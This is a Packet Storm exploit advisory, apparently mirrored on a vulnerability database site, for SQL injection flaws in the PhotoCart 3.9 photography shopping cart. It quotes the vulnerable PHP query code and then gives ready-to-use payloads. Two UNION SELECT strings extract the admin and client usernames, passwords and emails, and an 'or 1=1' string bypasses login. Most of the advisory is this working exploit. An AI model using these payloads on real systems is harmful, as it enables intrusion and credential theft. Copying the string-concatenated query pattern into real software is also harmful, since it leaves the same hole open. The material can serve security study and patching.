Lucene search
K

photocart-sql.txt

🗓️ 22 Aug 2008 00:00:00Reported by ~!Dok_tOR!~Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

PhotoCart 3.9 SQL Injection Vulnerabilit

Code
`Author: ~!Dok_tOR!~  
Date found: 18.08.08  
Product: PhotoCart  
Version: 3.9 возможно и более ранние версии  
Type: Photography Shopping Cart  
URL: www.picturespro.com  
Vulnerability Class: SQL Injection  
  
/[installdir]/search.php  
  
Vuln code:  
  
PHP:  
if($_REQUEST['searchby'] == "qtitle") {  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";  
print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";  
}  
if($_REQUEST['searchby'] == "qid") {  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";  
print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";  
}  
if($_REQUEST['searchby'] == "qdate") {  
$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";  
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";  
print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";  
}  
  
  
magic_quotes_gpc = Off  
  
Example:  
http://[server]/[installdir]/search.php  
  
Вводим в поле Gallery or event name:  
  
Exploit 1:  
  
' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*  
  
  
  
Exploit 2:  
  
' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*  
  
  
  
Authentication Bypass SQL Injection  
  
/[installdir]/_login.php  
  
Vuln code:  
  
PHP:  
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");  
  
  
Email Address: 1' or 1=1/*  
Password: 1' or 1=1/*  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation